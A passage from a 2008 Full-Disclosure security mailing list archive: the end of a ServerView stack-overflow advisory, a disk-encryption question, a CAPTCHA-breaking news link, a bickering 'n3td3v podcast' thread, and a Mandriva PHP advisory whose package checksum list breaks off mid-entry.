can cause a stack overflow by sending a specially-crafted URL to the ServerView web interface. Successful exploitation results in the execution of arbitrary code. Solution Description -------------------- Authenticate remote users who use the web interface to minimize potential malicious users. As of yet, a patch has not been issued by the vendor. Tested Systems / Software (with versions) ------------------------------------------ ServerView 04.60.07 was tested on Windows XP. Other versions are assumed to be vulnerable. Vendor Contact -------------- Name: Fujitsu Siemens Website: http://www.fujitsu-siemens.com/ Contact Information: Contact form - http://support.fujitsu-siemens.com/com/support/contact/contact.html -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080703/34bf8460/attachment.html From pentester at yahoo.com Wed Jul 2 20:52:24 2008 From: pentester at yahoo.com (nobody) Date: Wed, 2 Jul 2008 12:52:24 -0700 (PDT) Subject: [Full-disclosure] WinMagic HDE encryption Message-ID: <765815.12883.qm@web51005.mail.re2.yahoo.com> Anyone know if the page file (pagefile.sys) is encrypted when this product is installed and the hard drive encrypted. Also - using backtrack - can the hardrive (NTFS - 1 volume) be mounted after encryption. I have been successful on one machine and failed on another. In both cases "fdisk" reported exactly the same layout but mounting failed on 1 machine and succeeded on an identical machine. I did not have time to review the page file on the machine that I was able to mount the HD. ?? From ureleet at gmail.com Thu Jul 3 19:51:24 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 3 Jul 2008 14:51:24 -0400 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> Message-ID: <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> yeah, cause we need another podcast like u need a hole in the head. On Wed, Jul 2, 2008 at 2:16 PM, n3td3v wrote: > n3td3v is starting a podcast soon, I will be talking about the latest > news post on > n3td3v - Google Groups ... watch the internet for more info. > > All the best, > > n3td3v > > Public website: http://n3td3v.googlepages.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Thu Jul 3 19:53:30 2008 From: ureleet at gmail.com (Ureleet) Date: Thu, 3 Jul 2008 14:53:30 -0400 Subject: [Full-disclosure] =?windows-1252?q?Gmail=2C_Yahoo_and_Hotmail=92s?= =?windows-1252?q?_CAPTCHA_broken_by_spammers?= In-Reply-To: References: Message-ID: <6158bb410807031153u44275bb7t1217b2903a270f5e@mail.gmail.com> didnt this happen like 6 months ago too? come on! it'll be a tail chase, the vendors will improve the catcha, the spammers will break it, they'll improve it.. etc.. its never ending bullshit. On Thu, Jul 3, 2008 at 8:52 AM, Dancho Danchev wrote: > Hello, > > Breaking Gmail, Yahoo and Hotmail's CAPTCHAs, has been an urban legend > for over two years now, with do-it-yourself CAPTCHA breaking services, > and proprietary underground tools assisting spammers, phishers and > malware authors into registering hundreds of thousands of bogus > accounts for spamming and fraudulent purposes. This post intends to > make this official, by covering an underground service offering > thousands of already registered Gmail, Yahoo and Hotmail accounts for > sale, with new ones registered every second clearly indicating the > success rate of their CAPTCHA breaking capabilities at these services > : > > http://blogs.zdnet.com/security/?p=1418 > > Regards > -- > Dancho Danchev > Cyber Threats Analyst/Blogger > http://ddanchev.blogspot.com > http://blogs.zdnet.com/security > http://windowsecurity.com/Dancho_Danchev > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From xploitable at gmail.com Thu Jul 3 21:26:15 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 3 Jul 2008 21:26:15 +0100 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> Message-ID: <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote: > yeah, cause we need another podcast like u need a hole in the head. > Don't make death threats you can't carry out. Uncle sam is watching!!! All the best, n3td3v > On Wed, Jul 2, 2008 at 2:16 PM, n3td3v wrote: >> n3td3v is starting a podcast soon, I will be talking about the latest >> news post on >> n3td3v - Google Groups ... watch the internet for more info. >> >> All the best, >> >> n3td3v >> >> Public website: http://n3td3v.googlepages.com >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > From william at lefkovics.net Thu Jul 3 21:32:15 2008 From: william at lefkovics.net (William Lefkovics) Date: Thu, 3 Jul 2008 13:32:15 -0700 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> Message-ID: <024701c8dd4b$e1c8ad50$a55a07f0$@net> It wasn't a threat... it was a simile. :) -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v Sent: Thursday, July 03, 2008 1:26 PM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] n3td3v podcast On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote: > yeah, cause we need another podcast like u need a hole in the head. > Don't make death threats you can't carry out. Uncle sam is watching!!! All the best, n3td3v From xploitable at gmail.com Thu Jul 3 22:02:01 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 3 Jul 2008 22:02:01 +0100 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <024701c8dd4b$e1c8ad50$a55a07f0$@net> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> Message-ID: <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> On Thu, Jul 3, 2008 at 9:32 PM, William Lefkovics wrote: > It wasn't a threat... it was a simile. :) > Keep this thread bookmarked just incase, we don't actually know who Ureleet is, it could be an Al-Qaeda splinter cell working independently of Osama Bin Laden's command. All the best, n3td3v > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v > Sent: Thursday, July 03, 2008 1:26 PM > To: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] n3td3v podcast > > On Thu, Jul 3, 2008 at 7:51 PM, Ureleet wrote: >> yeah, cause we need another podcast like u need a hole in the head. >> > > Don't make death threats you can't carry out. Uncle sam is watching!!! > > All the best, > > n3td3v > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From buanzo at buanzo.com.ar Thu Jul 3 22:09:52 2008 From: buanzo at buanzo.com.ar (Arturo 'Buanzo' Busleiman) Date: Thu, 03 Jul 2008 18:09:52 -0300 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> Message-ID: <486D4020.50104@buanzo.com.ar> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 n3td3v wrote: | Keep this thread bookmarked just incase, we don't actually know who | Ureleet is, it could be an Al-Qaeda splinter cell working For all we know, Ureleet could be you. - -- Arturo "Buanzo" Busleiman Independent Security Consultant - SANS - OISSG http://www.buanzo.com.ar/pro/eng.html Mailing List Archives at http://archiver.mailfighter.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr t1DO0pkyd18vyilU9E5ePuo= =kwuM -----END PGP SIGNATURE----- From xploitable at gmail.com Thu Jul 3 22:26:51 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 3 Jul 2008 22:26:51 +0100 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <486D4020.50104@buanzo.com.ar> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> <486D4020.50104@buanzo.com.ar> Message-ID: <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com> On Thu, Jul 3, 2008 at 10:09 PM, Arturo 'Buanzo' Busleiman wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > n3td3v wrote: > | Keep this thread bookmarked just incase, we don't actually know who > | Ureleet is, it could be an Al-Qaeda splinter cell working > > For all we know, Ureleet could be you. > Now that's paranoia! Full background checks were done on me by the Home Office when I went on the Ethical Hacking course at Abertay Dundee. Remember viva end of n3td3v group and the Robert Lemos news article after that? That's when I fucked off to the course, that was advertised in the media to be monitored by the Home Office of the British Government. If I was a terrorist i'd of been arrested by now!!! Unless they're keeping me sweet to see if my web behaviour esculates. But yeah, i've been on the radar for years, If I was a cyber crook or terrorist I wouldn't be able to send this message to you just now because I would be incarcerated. Think about it for a second... Infact, I think I said at one point I was applying for a position at MI5, so do I really seem like Ureleet to you? All the best, n3td3v > - -- > Arturo "Buanzo" Busleiman > Independent Security Consultant - SANS - OISSG > http://www.buanzo.com.ar/pro/eng.html > Mailing List Archives at http://archiver.mailfighter.net > > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.6 (GNU/Linux) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFIbUAgAlpOsGhXcE0RClItAJ4ndrkAqFt+szk33UU47U4zmzJeLACfYHHr > t1DO0pkyd18vyilU9E5ePuo= > =kwuM > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From buanzo at buanzo.com.ar Thu Jul 3 23:06:47 2008 From: buanzo at buanzo.com.ar (Arturo 'Buanzo' Busleiman) Date: Thu, 03 Jul 2008 19:06:47 -0300 Subject: [Full-disclosure] n3td3v podcast In-Reply-To: <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com> References: <4b6ee9310807021116xb05210avca66b251ca35390d@mail.gmail.com> <6158bb410807031151u44989fa2qc7db35217e851a0b@mail.gmail.com> <4b6ee9310807031326i68f9b82apc6aab34f2729d1a@mail.gmail.com> <024701c8dd4b$e1c8ad50$a55a07f0$@net> <4b6ee9310807031402hbb1ab53w2b53d760f1d803c0@mail.gmail.com> <486D4020.50104@buanzo.com.ar> <4b6ee9310807031426g2effacfm50cec9558b12cabf@mail.gmail.com> Message-ID: <486D4D77.4090902@buanzo.com.ar> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 n3td3v wrote: | Infact, I think I said at one point I was applying for a position at | MI5, so do I really seem like Ureleet to you? Sorry, you're not THAT important. Well, maybe you are, but that's EXACTLY the point. Cya. - -- Arturo "Buanzo" Busleiman Independent Security Consultant - SANS - OISSG http://www.buanzo.com.ar/pro/eng.html Mailing List Archives at http://archiver.mailfighter.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIbU13AlpOsGhXcE0RCs63AJsFCjaTMpe/z+xRFfMJFoB6f+Q7tQCeM2c8 U3xNlqNx0cju9rU0/H+1X54= =QzFp -----END PGP SIGNATURE----- From security at mandriva.com Fri Jul 4 00:59:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 03 Jul 2008 17:59:00 -0600 Subject: [Full-disclosure] [ MDVSA-2008:127 ] - Updated PHP packages fix multiple vulnerabilities Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:127 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : July 3, 2008 Affected: 2008.0 _______________________________________________________________________ Problem Description: A number of vulnerabilities have been found and corrected in PHP: The htmlentities() and htmlspecialchars() functions in PHP prior to 5.2.5 accepted partial multibyte sequences, which has unknown impact and attack vectors (CVE-2007-5898). The output_add_rewrite_var() function in PHP prior to 5.2.5 rewrites local forms in which the ACTION attribute references a non-local URL, which could allow a remote attacker to obtain potentially sensitive information by reading the requests for this URL (CVE-2007-5899). php-cgi in PHP prior to 5.2.6 does not properly calculate the length of PATH_TRANSLATED, which has unknown impact and attack vectors (CVE-2008-0599). The escapeshellcmd() API function in PHP prior to 5.2.6 has unknown impact and context-dependent attack vectors related to incomplete multibyte characters (CVE-2008-2051). Weaknesses in the GENERATE_SEED macro in PHP prior to 4.4.8 and 5.2.5 were discovered that could produce a zero seed in rare circumstances on 32bit systems and generations a portion of zero bits during conversion due to insufficient precision on 64bit systems (CVE-2008-2107, CVE-2008-2108). The IMAP module in PHP uses obsolete API calls that allow context-dependent attackers to cause a denial of service (crash) via a long IMAP request (CVE-2008-2829). In addition, this update also corrects an issue with some float to string conversions. The updated packages have been patched to correct these issues. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0599 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2051 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2829 http://qa.mandriva.com/show_bug.cgi?id=37171 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 4964496fdee7d2fff5f4b1fa8c14532b 2008.0/i586/libphp5_common5-5.2.4-3.2mdv2008.0.i586.rpm 39937c9c935ad96fb6cf346018b81d57 2008.0/i586/php-bcmath-5.2.4-3.2mdv2008.0.i586.rpm 112de70d3898dea5b99248eff489a78d 2008.0/i586/php-bz2-5.2.4-3.2mdv2008.0.i586.rpm 3f4804e2a62bcafa66c1ca7a181537fd 2008.0/i586/php-calendar-5.2.4-3.2mdv2008.0.i586.rpm 14377775243a1d5d3f3eed5f1b01261c 2008.0/i586/php-cgi-5.2.4-3.2mdv2008.0.i586.rpm 6dbade915c57c8d2b87352f8fe6e0450 2008.0/i586/php-cli-5.2.4-3.2mdv2008.0.i586.rpm 7a0cd01543c1e9f032018b5ce05f664a 2008.0/i586/php-ctype-5.2.4-3.2mdv2008.0.i586.rpm 22f4036085ae339b6fe8248b4e316850 2008.0/i586/php-curl-5.2.4-3.2mdv2008.0.i586.rpm 84a3f3752567dbbe12a4942da80a5b30 2008.0/i586/php-dba-5.2.4-3.2mdv2008.0.i586.rpm 65916c79bd3716748f2115542402f9e1 2008.0/i586/php-dbase-5.2.4-3.2mdv2008.0.i586.rpm 4ed4fbfc2322ab332de781b078f5fbf6 2008.0/i586/php-devel-5.2.4-3.2mdv2008.0.i586.rpm 8de4887cda8cb1ca0527a7ddac80da34 2008.0/i586/php-dom-5.2.4-3.2mdv2008.0.i586.rpm c1c3eeb952c1492e65bafa53cc98dda7 2008.0/i586/php-exif-5.2.4-3.2mdv2008.0.i586.rpm 5f4cb00ef6a273b03be7749d8181c873 2008.0/i586/php-fcgi-5.2.4-3.2mdv2008.0.i586.rpm 38d62f9676137e7f4267ec488d029e12 2008.0/i586/php-filter-5.2.4-3.2mdv2008.0.i586.rpm f72252bd88ec2e34a7821aa5a70c37c1 2008.0/i586/php-ftp-5.2.4-3.2mdv2008.0.i586.rpm 63b43f95c94e3f121a49c2c6016995bd 2008.0/i586/php-gd-5.2.4-3.2mdv2008.0.i586.rpm 8cd73b8ca8370954c7e8c3f92b17cf26 2008.0/i586/php-gettext-5.2.4-3.2mdv2008.0.i586.rpm 43702222ddbc3e9e8674d893174eab02 2008.0/i586/php-gmp-5.2.4-3.2mdv2008.0.i586.rpm 3db9582768562fb6edca7d37504ac555 2008.0/i586/php-hash-5.2.4-3.2mdv2008.0.i586.rpm 0494c0f6d0d1526d308ed8d131fe8771 2008.0/i586/php-iconv-5.2.4-3.2mdv2008.0.i586.rpm 74e84b579bd1fafa55b3792795b32a2a 2008.0/i586/php-imap-5.2.4-3.2mdv2008.0.i586.rpm c25acebf5ab78b503ce889f9d434eb9d 2008.0/i586/php-json-5.2.4-3.2mdv2008.0.i586.rpm 75c0858eebc00515193a8525e6abc52f 2008.0/i586/php-ldap-5.2.4-3.2mdv2008.0.i586.rpm ad813ea774c87cc21dfc03e1737e9992 2008.0/i586/php-mbstring-5.2.4-3.2mdv2008.0.i586.rpm cd672d701608dbc6285e83805b0caed6 2008.0/i586/php-mcrypt-5.2.4-3.2mdv2008.0.i586.rpm daff2f108122f193b1cdb7c53a63b439 2008.0/i586/php-mhash-5.2.4-3.2mdv2008.0.i586.rpm 41713242ffef20ec2d201f47cf1394ad 2008.0/i586/php-mime_magic-5.2.4-3.2mdv2008.0.i586.rpm c532358f85d2dc2c29ca328a9b2bdc3d 2008.0/i586/php-ming-5.2.4-3.2mdv2008.0.i586.rpm f1ebed79be33a3a04ec75e6fc300b5d1 2008.0/i586/php-mssql-5.2.4-3.2mdv2008.0.i586.rpm 116cb44f5b7092d2dbd4a0e2f861350f 2008.0/i586/php-mysql-5.2.4-3.2mdv2008.0.i586.rpm 856c66c7136d7ca94fdf22b873664b75 2008.0/i586/php-mysqli-5.2.4-3.2mdv2008.0.i586.rpm 731889df3739bb8413bf81287ba40459 2008.0/i586/php-ncurses-5.2.4-3.2mdv2008.0.i586.rpm 9d100f8050649a4601ee2eecbaf9db22 2008.0/i586/php-odbc-5.2.4-3.2mdv2008.0.i586.rpm 3333c9d55426bfdf7b14a4f3bfc0280b 2008.0/i586/php-openssl-5.2.4-3.2mdv2008.0.i586.rpm 0faf70d76ad40914abb2b07235db0fe0 2008.0/i586/php-pcntl-5.2.4-3.2mdv2008.0.i586.rpm 420c8170c11b5bcbf858e897a625a568 2008.0/i586/php-pdo-5.2.4-3.2mdv2008.0.i586.rpm 33fa19cf7c0ec490aaa4150f4d1dc68e 2008.0/i586/php-pdo_dblib-5.2.4-3.2mdv2008.0.i586.rpm 89245d8ab6d05972005ac5fb963d9021 2008.0/i586/php-pdo_mysql-5.2.4-3.2mdv2008.0.i586.rpm d7b8841964b26212fca668441102bb02 2008.0/i586/php-pdo_odbc-5.2.4-3.2mdv2008.0.i586.rpm a68b90f68d6627772b0b5fcda4352616 2008.0/i586/php-pdo_pgsql-5.2.4-3.2mdv2008.0.i586.rpm 7de4ce0b46f67f2b5e86bac05bcdee1b 2008.0/i586/php-pdo_sqlite-5.2.4-3.2mdv2008.0.i586.rpm c2600185c76439cdf4485308d96f677b 2008.0/i586/php-pgsql-5.2.4-3.2mdv2008.0.i586.rpm 36067daf02d684c247a0198478a9eca9 2008.0/i586/php-posix-5.2.4-3.2mdv2008.0.i586.rpm ca12377f3130587ed0e291219298ea85 2008.0/i586/php-pspell-5.2.4-3.2mdv2008.0.i586.rpm 7bb0a857e8d68a167d2619896aa9138d 2008.0/i586/php-readline-5.2.4-3.2mdv2008.0.i586.rpm 3d84362d34a97213908a060a011b761b 2008.0/i586/php-recode-5.2.4-3.2mdv2008.0.i586.rpm b3be6e8921d1400699bf5dd8d01534b8 2008.0/i586/php-session-5.2.4-3.2mdv2008.0.i586.rpm de73d4de81f7ff00ed7043fdaeb92c2b 2008.0/i586/php-shmop-5.2.4-3.2mdv2008.0.i586.rpm 4e90e4c3bbf351c3e25d719803dbbbcd 2008.0/i586/php-simplexml-5.2.4-3.2mdv2008.0.i586.rpm 0ba85b7cd04ae54c1be0212a3651abe7 2008.0/i586/php-snmp-5.2.4-3.2mdv2008.0.i586.rpm 1edddb67795d167f199d08ad7c8544f7 2008.0/i586/php-soap-5.2.4-3.2mdv2008.0.i586.rpm 447a4d2ce60d61385f655800582b255f 2008.0/i586/php-sockets-5.2.4-3.2mdv2008.0.i586.rpm 7d1da4760885e4a93085a3251522c359 2008.0/i586/php-sqlite-5.2.4-3.2mdv2008.0.i586.rpm 8ed94bd708eaa97d8274c3247f431a09 2008.0/i586/php-sysvmsg-5.2.4-3.2mdv2008.0.i586.rpm d1a8c118166c26bdd9a51a6539c2170d 2008.0/i586/php-sysvsem-5.2.4-3.2mdv2008.0.i586.rpm 8fcb4e6ff9be40125d31dfa72c91304a 2008.0/i586/php-sysvshm-5.2.4-3.2mdv2008.0.i586.rpm e41ed56b79a47764bd2569c4807ef6c5 2008.0/i586/php-tidy-5.2.4-3.2mdv2008.0.i586.rpm d004aa350d12aa97d9e38facb7384923 2008.0/i586/php-tokenizer-5.2.4-3.2mdv2008.0.i586.rpm 9b530981f55d4c13a135e9795ae26e80 2008.0/i586/php-wddx-5.2.4-3.2mdv2008.0.i586.rpm 1d69762dc0ab2230eaa1b89649aa321d 2008.0/i586/php-xml-5.2.4-3.2mdv2008.0.i586.rpm 79c68e71802c054e7f6a3fff96c135de 2008.0/i586/php-xmlreader-5.2.4-3.2mdv2008.0.i586.rpm efe5041757651f3b5e699031f6cdf69f 2008.0/i586/php-xmlrpc-5.2.4-3.2mdv2008.0.i586.rpm 21ffedc32409617c2aa4e433818e349a 2008.0/i586/php-xmlwriter-5.2.4-3.2mdv2008.0.i586.rpm a9317dbd662e0c0a9d718ed37c2b2bad 2008.0/i586/php-xsl-5.2.4-3.2mdv2008.0.i586.rpm 5c4ed89d027aea291d01d535a0b9b404 2008.0/i586/php-zlib-5.2.4-3.2mdv2008.0.i586.rpm 2c717855b2ed804e20c05da11f958e6b 2008.0/SRPMS/php-5.2.4-3.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 7c6ec0a220b884b70591d817b018854e 2008.0/x86_64/lib64php5_common5-5.2.4-3.2mdv2008.0.x86_64.rpm f82a02bf5481d88a10fd4a9435da20f1 2008.0/x86_64/php-bcmath-5.2.4-3.2mdv2008.0.x86_64.rpm c07ecb49cc0c56f85c2240c77d55e604 2008.0/x86_64/php-bz2-5.2.4-3.2mdv2008.0.x86_64.rpm 55f39affa7ae19880ba553909c6f22fd 2008.0/x86_64/php-calendar-5.2.4-3.2mdv2008.0.x86_64.rpm 84419c18107b9c0a1b0babbd97dc60b2 2008.0/x86_64/php-cgi-5.2.4-3.2mdv2008.0.x86_64.rpm 76cd079e91c6c4e295769fe37b7bbb87 2008.0/x86_64/php-cli-5.2.4-3.2mdv2008.0.x86_64.rpm 7fc9beea712fd5078c89c34af19a9946 2008.0/x86_64/php-ctype-5.2.4-3.2mdv2008.0.x86_64.rpm d284562916df646f74a804f91fcd659a 2008.0/x86_64/php-curl-5.2.4-3.2mdv2008.0.x86_64.rpm faa6f7d38a59cfa81e931e9537f6381d 2008.0/x86_64/php-dba-5.2.4-3.2mdv2008.0.x86_64.rpm 0403c3c1073a5e4887dd978ba4c0b14a 2008.0/x86_64/php-dbase-5.2.4-3.2mdv2008.0.x86_64.rpm 2571b773d626d0c2b14fca3be0dbcdd5 2008.0/x86_64/php-devel-5.2.4-3.2mdv2008.0.x86_64.rpm c0beeee29f9d5306162b59593f4b6590 2008.0/x86_64/php-dom-5.2.4-3.2mdv2008.0.x86_64.rpm c391c5b836ad63f1599333a823f9785b 2008.0/x86_64/php-exif-5.2.4-3.2mdv2008.0.x86_64.rpm c5af8ee7d5938468ea36424adddb42cb 2008.0/x86_64/php-fcgi-5.2.4-3.2mdv2008.0.x86_64.rpm a1e2e7e3c5d96ba24a205f0c6f799755 2008.0/x86_64/php-filter-5.2.4-3.2mdv2008.0.x86_64.rpm 5d0f0db6c857986a8e0bed8ce1b2f274 2008.0/x86_64/php-ftp-5.2.4-3.2mdv2008.0.x86_64.rpm f29b00bc367ec0c17fca44a0eca1d2ee 2008.0/x86_64/php-gd-5.2.4-3.2mdv2008.0.x86_64.rpm 9f36fac78f0615052cb1459981796eb5 2008.0/x86_64/php-gettext-5.2.4-3.2mdv2008.0.x86_64.rpm 8b02cd2bfc64dafe36221ab2a84f1e1e 2008.0/x86_64/php-gmp-5.2.4-3.2mdv2008.0.x86_64.rpm 6b8b3e930cad66d85c1e7c3798082696 2008.0/x86_64/php-hash-5.2.4-3.2mdv2008.0.x86_64.rpm a7f7d7e45415de6e8806ec8cd24fab15 2008.0/x86_64/php-iconv-5.2.4-3.2mdv2008.0.x86_64.rpm e71c04769901527f75bb32900d19138e 2008.0/x86_64/php-imap-5.2.4-3.2mdv2008.0.x86_64.rpm ea23fc2159c3fe956eef9a55335b87f4 2008.0/x86_64/php-json-5.2.4-3.2mdv2008.0.x86_64.rpm 6ff77a39d3998b24650dc91eb09e902e 2008.0/x86_64/php-ldap-5.2.4-3.2mdv2008.0.x86_64.rpm 441208300d91f0849ca6e0b8e26b9b19 2008.0/x86_64/php-mbstring-5.2.4-3.2mdv2008.0.x86_64.rpm a95bec26dfd5e2a8773a5edcca612c9b 2008.0/x86_64/php-mcrypt-5.2.4-3.2mdv2008.0.x86_64.rpm 167bc322f2204d4c643ce499e8f303a2 2008.0/x86_64/php-mhash-5.2.4-3.2mdv2008.0.x86_64.rpm 34b6a244a5361ea596b78e31e152087d 2008.0/x86_64/php-mime_magic-5.2.4-3.2mdv2008.0.x86_64.rpm 07c137c89962d1bf9f02eb76d590fc9b 2008.0/x86_64/php-ming-5.2.4-3.2mdv2008.0.x86_64.rpm a4a23328014899da202ca3585202fb14 2008.0/x86_64/php-mssql-5.2.4-3.2mdv2008.0.x86_64.rpm fc523fd93e5ed4f8b5b2bdebfbb084c1 2008.0/x86_64/php-mysql-5.2.4-3.2mdv2008.0.x86_64.rpm d0c36a5ec8f31317ef18d4f86ab0d0e8 2008.0/x86_64/php-mysqli-5.2.4-3.2mdv2008.0.x86_64.rpm 5548d0c4b41141ef095cef2b10e48e65 2008.0/x86_64/php-ncurses-5.2.4-3.2mdv2008.0.x86_64.rpm 4afea2b1f843ab580288c7d2e2970885 2008.0/x86_64/php-odbc-5.2.4-3.2mdv2008.0.x86_64.rpm 46ba4fa02760007576378428bb80feb5 2008.0/x86_64/php-openssl-5.2.4-3.2mdv2008.0.x86_64.rpm 79ff2c4c60b58c950db9336e1ba2e5ec 2008.0/x86_64/php-pcntl-5.2.4-3.2mdv2008.0.x86_64.rpm 30a0c1a42dee0e63df8edf4a03705583 2008.0/x86_64/php-pdo-5.2.4-3.2mdv2008.0.x86_64.rpm 4934e452fdddfea4bd049319256e5c0b 2008.0/x86_64/php-pdo_dblib-5.2.4-3.2mdv2008.0.x86_64.rpm 2aac1840cceb12487440906758b302d9 2008.0/x86_64/php-pdo_mysql-5.2.4-3.2mdv2008.0.x86_64.rpm e2f8ff3183b0aa2502f6f0f8b9c25dbf 2008.0/x86_64/php-pdo_odbc-5.2.4-3.2mdv2008.0.x86_64.rpm 8f6d42248dbb2733ea961832bf1c8002 2008.0/x86_64/php-pdo_pgsql-5.2.4-3.2mdv2008.0.x86_64.rpm 12fa367e082312b6ca239c48aa60d532 2008.0/x86_64/php-pdo_sqlite-5.2.4-3.2mdv2008.0.x86_64.rpm 80cef4fd4f1bd43aafd329f5d3dd0746 2008.0/x86_64/php-pgsql-5.2.4-3.2mdv2008.0.x86_64.rpm ffe606c87612f73ce2aa346e2f6ef88a 2008.0/x86_64/php-posix-5.2.4-3.2mdv2008.0.x86_64.rpm e5a43918a92e042abb8744462c11450d 2008.0/x86_64/php-pspell-5.2.4-3.2mdv2008.0.x86_64.rpm 3489f296995bbd4c39060a4dcef708a8 2008.0/x86_64/php-readline-5.2.4-3.2mdv2008.0.x86_64.rpm 056f4802270d25466956722a084c0630 2008.0/x86_64/php-recode-5.2.4-3.2mdv2008.0.x86_64.rpm de836669d4705ce2876002be7c0ac0f5 2008.0/x86_64/php-session-5.2.4-3.2mdv2008.0.x86_64.rpm a6911b797b25eaecd320da289c8a6032 2008.0/x86_64/php-shmop-5.2.4-3.2mdv2008.0.x86_64.rpm b477a40948286c534204d1d4f22f9ab0 2008.0/x86_64/php-simplexml-5.2.4-3.2mdv2008.0.x86_64.rpm 80f3d118ca6cf804d4ae1f9239ca443b 2008.0/x86_64/php-snmp-5.2.4-3.2mdv2008.0.x86_64.rpm b84262ac2963a40a1b2cead035c73a66 2008.0/x86_64/php-soap-5.2.4-3.2mdv2008.0.x86_64.rpm 06c54cc25362d9402c57975c0c1fdb6c 2008.0/x86_64/php-sockets-5.2.4-3.2mdv2008.0.x86_64.rpm 979551b073fb7a07dac96b7590e75eab 2008.0/x86_64/php-sqlite-5.2.4-3.2mdv2008.0.x86_64.rpm 76a11ff08c0e8b10b54996ddc4d24f33 